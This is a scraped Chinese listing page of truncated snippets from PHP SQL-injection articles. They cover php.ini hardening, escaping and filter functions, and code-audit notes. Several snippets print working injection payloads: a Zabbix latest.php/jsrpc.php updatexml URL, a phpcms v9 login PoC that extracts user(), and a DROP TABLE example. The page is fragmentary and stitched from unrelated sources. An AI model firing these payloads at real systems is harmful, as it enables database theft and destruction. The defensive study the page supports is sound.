Zabbix 2.2.14之前的版本和3.0.4之前的3.0版本latest.php页面提取cookie中的zbx_sessionid的后16位246c58ba963457efhttp://192.168.49.2:8080/latest.php?output.php=ajax&sid=246c58ba963457ef&favobj=toggle&toggle_open_state=1&toggle_ids=updatexml(0,concat(0xa,database()),0)jsrpc.php页面http://192.168.49.2:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=upd...
1.首先将magic_quotes_gpc设置为On,display_errors设置为Off.2.项目正式上线后,调用 mysql_query 等 mysql 函数时,前面应该加上 @,即 @mysql_query(...) ,这样 mysql 错误不会被输出。同理以免让攻击者分析出有用的信息。3.在php.ini里把register_globals = On该成register_globals = Off, 这点的好处就是让你php中的变量不能直接从get/post等地方获取,而是由你自己程序上获取4.安全参数获取函数:<?php define("XH_PARA...
如果用户的输入不加修改就插入到SQL查询里,这个应用程序会容易受到SQL注入,就像下面这样: $unsafe_variable = $_POST[‘user_input‘]; mysql_query("INSERT INTO `table` (`column`) VALUES (‘$unsafe_variable‘)"); 这是因为用户能够输入像value‘); DROP TABLE table;--之类的代码,然后这个查询就变成了: INSERT INTO `table` (`column`) VALUES(‘value‘); DROP TABLE table;--‘) ...
. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考 1. 漏洞描述2. 漏洞触发条件 0x1: POChttp://localhost/phpcms_v9/index.php?m=member&c=index&a=logindosubmit=1&username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2buser())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%25...
create database sqltest charset utf8 2 3 create table test ( 4 id int,5 name varchar(10), 6 age tinyint unsigned7 )engine=myisam charset=utf8插入数据如下 我们分成字段为数值类型和字符串类型两种方式进行测试:一、下面开始测试字段为数值类型时的sql注入,sql语句:1 $id= $_GET[‘tid‘]; 2 $sql = "select * from test where id = $id";查找id为1的记录,在浏览器中输入并执行如下 可以看到,此时只查询到1条记录,...
首先说说sql注入攻击的模式,基本上都是后台在接受前端传递的参数的时候将sql代码或脚本代码混入到提交信息中,如果在接受提交的参数的时候没有做精确的数据验证,很可能就让别人钻了空子;轻则暴库,重则数据库数据都会被删;所以想要预防sql注入, 关键是程序员写的代码一定要严谨,对数据做严格的验证,数据类型,长度,正则等都可以做;http://hudeyong926.iteye.com/blog/703074这个里面验证规则可以参考;在做防止sql注入的时...
$DBConnection = mysql_connect ( "$dbhost", "$dbuser", "$dbpwd" ); mysql_select_db ( "$dbdatabase" ); if(isset($_GET[‘submit‘]) && $_GET[‘submit‘]){ $sql="select * from test where name=‘".$_GET[‘username‘]."‘and password=‘".$_GET[‘password‘]."‘"; //echo $sql;exit; $result=mysql_query($sql,$DBConnection); $num=mysql_num_rows($result); ...
if(function_exists(‘mysql_escape_string‘)){ return mysql_escape_string($str); }elseif( function_exists(...real_escape...)){ //real_escape }else{ if(MAGIC_QUOTER ....判断){ return $str }else{ return addslashes($str); } } } 但是这篇文章却告诉我,原来这三个函数的功能各有不同,前两个我当然知道,但如果...
function clean($str){ $str=trim($str); $str=strip_tags($str); $str=stripslashes($str); $str=addslashes($str); $str=rawurldecode($str); $str=quotemeta($str); $str=htmlspecialchars($str); $str=preg_replace("//+|/*|/`|//|/-|/$|/#|/^|/!|/@|/%|/&|/~|/^|/[|/]|/‘|/"/", "", $str);//去除特殊符号+*`/-$#^~!@#$%&[]‘" $str=preg_replace("//s/", "", $str);//去除空格、换行符、制表符 return $str;} 转自网络php防s...
2.使用Seay代码审计系统的全局搜索功能,搜索包含关键字为”base64_decode”的文件,发现SettingAction.class.php包含一个对接收的参数auth进行base64_decode的地方:3.我们跟进这个php文件,发现虽然使用daddslashes函数进行了注入过滤,但是使用了base64_decode函数对参数auth进行了转码从而可以绕过过滤造成注入://认证电子邮件public function doauth() { $_authmsg=daddslashes($_GET[‘auth‘]);//再次判断GPC是否开启并...
可以看到,服务端处理GET和POST请求的变量时都会做addslashes处理。Part2:审计过程1.首先在个人发布简历处:elseif ($act == ‘make4_save‘) { $resume_education = get_resume_education($_SESSION[‘uid‘], $_REQUEST[‘pid‘]); if (count($resume_education) >= 6) showmsg(‘教育经历不能超过6条!‘, 1, $link); $setsqlarr[‘uid‘] = intval($_SESSION[‘uid‘]); $setsqlarr[‘pid‘] = intval($_REQUEST[‘...
`id` int(11) NOT NULL auto_increment, `subject` varchar(60) NOT NULL default ”, `name` varchar(40) NOT NULL default ”, `email` varchar(25) NOT NULL default ”, `question` mediumtext NOT NULL, `postdate` datetime NOT NULL default ’0000-00-00 00:00:00′, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=gb2312 COMMENT=’运用者的留言’ AUTO_INCREMENT=69 ; grant all privileges on ch3.* to ...
【一、在服务器端配置】 安全,PHP代码编写是一方面,PHP的配置更是非常关键。我们php手手工安装的,php的默认配置文件在 /usr/local/apache2/conf/php.ini,我们最主要就是要配置php.ini中的内容,让我们执行 php能够更安全。整个PHP中的安全设置主要是为了防止phpshell和SQL Injection的攻击,一下我们慢慢探讨。我们先使用任何编辑工具打开 /etc/local/apache2/conf/php.ini,如果你是采用其他方式安装,配置文件可能不在...
2、调用此函数 过滤参数中的value值static function filterParams(&$params, $tmp = array()){if(is_array($params)){foreach($params as $k => &$v){if(is_array($v)){self::filterParams($v);}else{self::filterWords($v);}}}else{$arr[] = self::filterWords($params);}return $params;}3、调用此函数,过滤参数中的key值 1 static function filterKeys($arr, $subKey, &$myArr)2 {3 foreach($arr as $k=>$v)4 ...
sql注入是web安全中最常见,也是平常中危害最大的漏洞。 最近在学习代码审计,拿自己审核的一段代码做个笔记。 1、sql语句拼接可能引起sql注入 很多偷懒的程序员对于没有过滤的参数,直接将其拼接到sql语句中,可能导致命令执行。 如:$sql = "select count(*) as qty from t_user where f_uid=‘"+$userAccount+"‘ and f_password=‘"+$password+"‘"; 造成sql注入时的sql语句就变成了select count(*) as qty from t_user wher...